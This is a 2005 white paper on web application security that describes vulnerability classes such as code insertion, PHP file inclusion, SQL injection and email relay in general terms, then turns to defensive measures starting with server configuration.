Programming: The Heart of Web Security I

July 2, 2005

Many types of security problems can give rise to this type of risk. These include insertion of JavaScript, PHP or VBScript code into the website (thus allowing actions unintended by the site designers to be executed against other clients of the site), problems related to authentication (affecting the privacy of site users, with all of the legal ramifications that one can imagine) and retrieval of theoretically inaccessible information (as a result, for example, of SQL injection).

Flaws that Place the Website Host Server at Risk
These flaws can have the most profound consequences. In effect, a hacker who succeeds in taking control of a server that hosts a site has an unlimited field of action, being able to modify the site, access any confidential information desired, and use the server as a base for other illegal actions. Flaws that grant access to all of the server files (or to many of them) or which allow commands to be executed on the server can lead rapidly to such consequences.

1.3 Potential Application Flaws
The nature of flaws that can be hidden in a web application depends basically on the languages, development techniques and external programs employed on the site. Web applications can quickly become very complex and very diverse, both in terms of functionality and the components deployed. It would be a long, tedious, and ultimately impossible task to attempt to list all of the potential flaws associated with each of the languages and components in use today.

In order to represent current reality as close as possible, we will focus on analyzing the vulnerability of websites that are based on an archiin common use today. The analysis and proposed measures presented in the remainder of this paper assume these basic and primary characteristics.

Image: http://www.securitydocs.com/images/papers/WP%20Programming-1.png

1.3.1 Error Searching and Configuration Flaws
Problems with Website Configuration and Structure
Web server configuration problems frequently give rise to other vulnerabilities. An essential first step for a minimal first level of security, then, is to define an optimal configuration that limits the possibilities for external manipulation.

Classic configuration and structural problems include allowing certain directory listings to be obtained (and, therefore, certain files to be downloaded) and allowing archives and documentation to be accessed directly on the site.

Certain flaws can allow even more extensive access, to the point that files on the site can be created and deleted.

Poor Authentication Strategy

Problems can arise from a poorly designed authentication system that allows, for example, both unregistered and registered persons to be authenticated. This is the most common kind of problem, due to the fact that client passwords can be guessed and because applications may have default passwords. In some cases, cookie manipulation can also produce results of this nature.

A similar, but greater, danger lies in the possibility that, once authenticated, a legitimate but malicious client may be able to make the server believe that it is a different legitimate client, and thereby gain access to information relating to other registered accounts.

1.3.2 Strategies for Attacking Applications
Code Insertion
Code insertion is a major strategy for attacking websites today. The principle is to insert external source code into a database or into other files on the targeted site. In this way, the hacker is able to reprogram a part of the website and cause clients of the site, or of the host server, to experience actions unintended in the original site design. The consequences of this type of flaw vary a great deal, depending basically on the type of programming language inserted into the site. Within the framework of the reference web server that we have defined, three types of insertion are possible:

* Insertion of JavaScript Code JavaScript is a language interpreted by the browser of the client accessing an application. This language provides few opportunities to hackers, but it does allow access to certain types of sensitive information, such as the client’s authentication ID’s, which could permit a hacker to access an application by appearing to be the client.
* Insertion of PHP Code PHP is a language interpreted by the server hosting the application. Given that PHP language presents nearly infinite possibilities, an insertion of this type irremediably compromises the server and, thus, the application.
* Insertion of XML Code XML code is used to format certain types of data. An XML insertion allows the data display seized by the hacker to be hijacked, and can also lead to numerous other illicit activities.

Opening of Files and Execution of Commands
To exploit this kind of flaw, the hacker modifies the arguments of certain PHP-specific functions, forcing the script to invoke actions that were not intended by the programmer.

The functions affected by this problem are mainly those related to file opening and inclusion, which can be hijacked to give the hacker access to files present on the server hosting the application (files containing script sources, configuration files, logs, password files, etc.).

Moreover, the include function authorizes inclusion of PHP code in a script. It also permits remote inclusion, meaning the ability to call, via the Web, web functions that are coded and located elsewhere. This makes it possible to execute external PHP code on the server, which seriously compromises the server’s security.

SQL Insertion
SQL is a language that allows databases to be queried by external elements. When a website script performs an SQL query, arguments supplied by the user are inserted. The user can try to modify these arguments, reprogramming the SQL query to access data that theoretically is prohibited.

With the widespread use of databases, and above all the ease of designing and integrating them using languages such as PHP and MySQL, this technique has become increasingly widespread and is at the heart of site hacking.

Email Relay
Enabling a web server to direct email is a technique that can be used for malicious purposes. If the user is able to designate the destination address, as is the case with many web applications, he or she can use this functionality to spam (send anonymous promotional email) or to unleash a Denial of Service (DoS) attack, which operates by overloading the mailbox. The hacker can also use this technique to gain the confidence of other users (by passing as the site administrator, for example).

2 Solutions for Increased Security

Having examined the various security problems that can or do affect applications, let us now consider the techniques and essential precautionary measures that must be taken to guarantee users an optimal level of privacy. This is a holistic response aimed at protecting the interests of the business in several respects:

* Availability of systems and applications
* Protection of critical data and client information
* Confidentiality of application source code

2.1 A Step-by-Step Response
An authentication system, even a very elaborate one, will not provide much protection to user data if it is possible to access the entire base of user accounts because of a structural flaw in the way that the application and the database work together.

Even the slightest details are important. A security problem, even a slight one, can give rise to other flaws that are very serious. It is therefore essential to assure a sufficient level of security across all of the layers and components of the web application.

2.1.1 Web Server Security
Before all else, web server security begins with an examination of the configuration file. The server configuration file allows user rights to be delimited and the manner in which they function to be defined. It is necessary to find the optimal configuration that allows the application to function without compromising rights or supplementary services Add-on modules (which provide functionality that is supplementary to the server) may have their own configuration files that also need to be optimized.

Posted in WhitePapers